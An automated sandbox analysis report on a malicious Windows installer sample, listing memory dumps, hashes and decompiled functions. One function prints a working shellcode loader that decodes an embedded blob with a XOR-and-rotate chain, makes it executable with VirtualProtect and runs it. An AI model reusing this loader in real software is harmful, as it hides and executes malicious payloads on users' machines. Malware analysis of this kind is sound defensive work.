                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-2690760731
                                                                                                • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                                • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                                                                                • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                                • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAF530, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187libraryloadermemoryCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDAF530(void* __ecx) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _t12;
				void* _t51;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				char _t120;

				_t51 = __ecx;
				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
				 *0x6edc72a4 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
				if( *0x6edc72a4 != 0) {
					_t12 =  *0x6edc72a4; // 0x2980000
					E6EDAF8F0(_t51, _t12, 0x11e1a300);
					 *0x6edc72a0 = 0;
					while( *0x6edc72a0 < 0x12ec) {
						_t89 =  *0x6edc72a0; // 0x12ec
						_t4 =  &E6EDC2000 + _t89; // 0x7265766f
						 *0x6edc7f28 =  *_t4;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000068;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000005 | ( *0x6edc7f28 & 0x000000ff) << 0x00000003;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000001f;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000002 | ( *0x6edc7f28 & 0x000000ff) << 0x00000006;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x5a;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000007a;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x98;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000021;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x76;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000008b;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xef;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xcf;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000006 | ( *0x6edc7f28 & 0x000000ff) << 0x00000002;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000086;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000001 | ( *0x6edc7f28 & 0x000000ff) << 0x00000007;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000007 | ( *0x6edc7f28 & 0x000000ff) << 0x00000001;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x000000bb;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x24;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						_t86 =  *0x6edc72a0; // 0x12ec
						_t120 =  *0x6edc7f28; // 0x0
						 *((char*)( &E6EDC2000 + _t86)) = _t120;
						_t87 =  *0x6edc72a0; // 0x12ec
						 *0x6edc72a0 = _t87 + 1;
					}
					VirtualProtect( &E6EDC2000, 0x12ec, 0x40, 0x6edc7f24);
					E6EDC2000(); // executed
					return 0;
				}
				return 0;
			}











                                                                                                0x6edaf530
                                                                                                0x6edaf54d
                                                                                                0x6edaf567
                                                                                                0x6edaf57b
                                                                                                0x6edaf587
                                                                                                0x6edaf595
                                                                                                0x6edaf59b
                                                                                                0x6edaf5a3
                                                                                                0x6edaf5be
                                                                                                0x6edaf5ce
                                                                                                0x6edaf5d4
                                                                                                0x6edaf5da
                                                                                                0x6edaf5e9
                                                                                                0x6edaf5fc
                                                                                                0x6edaf618
                                                                                                0x6edaf626
                                                                                                0x6edaf639
                                                                                                0x6edaf647
                                                                                                0x6edaf65a
                                                                                                0x6edaf66a
                                                                                                0x6edaf685
                                                                                                0x6edaf698
                                                                                                0x6edaf6a7
                                                                                                0x6edaf6b7
                                                                                                0x6edaf6ca
                                                                                                0x6edaf6d8
                                                                                                0x6edaf6eb
                                                                                                0x6edaf6fa
                                                                                                0x6edaf709
                                                                                                0x6edaf719
                                                                                                0x6edaf72b
                                                                                                0x6edaf73d
                                                                                                0x6edaf74c
                                                                                                0x6edaf75e
                                                                                                0x6edaf779
                                                                                                0x6edaf788
                                                                                                0x6edaf79a
                                                                                                0x6edaf7a9
                                                                                                0x6edaf7b8
                                                                                                0x6edaf7d2
                                                                                                0x6edaf7e5
                                                                                                0x6edaf7ff
                                                                                                0x6edaf812
                                                                                                0x6edaf824
                                                                                                0x6edaf837
                                                                                                0x6edaf846
                                                                                                0x6edaf858
                                                                                                0x6edaf86b
                                                                                                0x6edaf87e
                                                                                                0x6edaf890
                                                                                                0x6edaf8a0
                                                                                                0x6edaf8b3
                                                                                                0x6edaf8b8
                                                                                                0x6edaf8be
                                                                                                0x6edaf8c4
                                                                                                0x6edaf5af
                                                                                                0x6edaf5b8
                                                                                                0x6edaf5b8
                                                                                                0x6edaf8e0
                                                                                                0x6edaf8e8
                                                                                                0x00000000
                                                                                                0x6edaf8ea
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6EDAF540
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 6EDAF547
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6EDAF55A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 6EDAF561
                                                                                                • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 6EDAF578
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                                • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                                • API String ID: 1786449878-3286849197
                                                                                                • Opcode ID: 1de341b4d54db0b1cb2eae76027c244879ed7c3ca5030bc40575109cc48a9709
                                                                                                • Instruction ID: beb1050e1a7010fea8d81696bef197e21a36ca1f158daa8fbdb20c8e32a26e10
                                                                                                • Opcode Fuzzy Hash: 1de341b4d54db0b1cb2eae76027c244879ed7c3ca5030bc40575109cc48a9709
                                                                                                • Instruction Fuzzy Hash: 5E91286440DEDABDFF17877B84EC1607FAD562FAF2728408AE0D2462C6C56442C7DB25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC2402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDC24DC
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC2506
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16), ref: 6EDC251D
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC253F
                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349,00000000,00000000), ref: 6EDC25B2
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC25BD
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349,00000000), ref: 6EDC2608
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                • String ID:
                                                                                                • API String ID: 656311269-0
                                                                                                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                                • Instruction ID: 29806ce40b8026486001e21f77a9aa2ef82c12f616e1f3678abd0f267b2c9485
                                                                                                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                                • Instruction Fuzzy Hash: 4861B170E10A05ABDB10CFF4C894BAEB7B9BF48B54F109419E511EB390EB70DD418B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405C49(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x4091f8);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                0x00405c51
                                                                                                0x00405c54
                                                                                                0x00405c5b
                                                                                                0x00405c63
                                                                                                0x00405c70
                                                                                                0x00000000
                                                                                                0x00405c77
                                                                                                0x00405c66
                                                                                                0x00405c6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405c7f

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                                • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                                                                                • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                                • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405C22(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c028;
			}




                                                                                                0x00405c2d
                                                                                                0x00405c36
                                                                                                0x00000000
                                                                                                0x00405c43
                                                                                                0x00405c39
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 00405C2D
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                                • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                                                                                • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                                • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "jpfyweowskz Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                                0x00403813
                                                                                                0x0040381c
                                                                                                0x0040395d
                                                                                                0x00403961
                                                                                                0x00403965
                                                                                                0x00403967
                                                                                                0x0040396c
                                                                                                0x00403977
                                                                                                0x00403982
                                                                                                0x00403987
                                                                                                0x00403989
                                                                                                0x0040398b
                                                                                                0x0040398e
                                                                                                0x00403993
                                                                                                0x004039a1
                                                                                                0x004039ae
                                                                                                0x004039b5
                                                                                                0x004039b5
                                                                                                0x004039b6
                                                                                                0x004039b6
                                                                                                0x004039bb
                                                                                                0x004039c1
                                                                                                0x004039c8
                                                                                                0x004039ce
                                                                                                0x004039d0
                                                                                                0x00403a10
                                                                                                0x00403a15
                                                                                                0x00403a1a
                                                                                                0x00403a1a
                                                                                                0x00403a1f
                                                                                                0x00403a28
                                                                                                0x00403a2a
                                                                                                0x00403a2f
                                                                                                0x00403a35
                                                                                                0x00403a39
                                                                                                0x00403a39
                                                                                                0x00403a3e
                                                                                                0x00403a44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403a4a
                                                                                                0x00403a4f
                                                                                                0x00403a55
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403a5e
                                                                                                0x00403a66
                                                                                                0x00403a6b
                                                                                                0x00403a6e
                                                                                                0x00403a74
                                                                                                0x00403a79
                                                                                                0x00403a7c
                                                                                                0x00403a82
                                                                                                0x00403a87
                                                                                                0x00403a8a
                                                                                                0x00403a90
                                                                                                0x00403a98
                                                                                                0x00403a9e
                                                                                                0x00403aa4
                                                                                                0x00403aa8
                                                                                                0x00403aaf
                                                                                                0x00403aaf
                                                                                                0x00403aaf
                                                                                                0x00403ab9
                                                                                                0x00403acb
                                                                                                0x00403ad7
                                                                                                0x00403adc
                                                                                                0x00403ae6
                                                                                                0x00403aec
                                                                                                0x00403aee
                                                                                                0x00403af3
                                                                                                0x00403af0
                                                                                                0x00403af0
                                                                                                0x00403af0
                                                                                                0x00403b03
                                                                                                0x00403b1b
                                                                                                0x00403b1d
                                                                                                0x00403b23
                                                                                                0x00403b38
                                                                                                0x00403b25
                                                                                                0x00403b2e
                                                                                                0x00403b30
                                                                                                0x00403b30
                                                                                                0x00403b3e
                                                                                                0x00403b4e
                                                                                                0x00403b5f
                                                                                                0x00403b66
                                                                                                0x00403b6c
                                                                                                0x00403b70
                                                                                                0x00403b75
                                                                                                0x00403b77
                                                                                                0x00000000
                                                                                                0x00403b7d
                                                                                                0x00403b7d
                                                                                                0x00403b7f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403b85
                                                                                                0x00403b89
                                                                                                0x00403bae
                                                                                                0x00403bb4
                                                                                                0x00403bba
                                                                                                0x00403bbc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403be2
                                                                                                0x00403be8
                                                                                                0x00403bea
                                                                                                0x00403bef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403bf5
                                                                                                0x00403bf8
                                                                                                0x00403bfb
                                                                                                0x00403c12
                                                                                                0x00403c1e
                                                                                                0x00403c37
                                                                                                0x00403c3d
                                                                                                0x00403c41
                                                                                                0x00403c46
                                                                                                0x00403c4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403c56
                                                                                                0x00403c61
                                                                                                0x00000000
                                                                                                0x00403c61
                                                                                                0x00403b8b
                                                                                                0x00403b91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403b97
                                                                                                0x00403b9d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403ba3
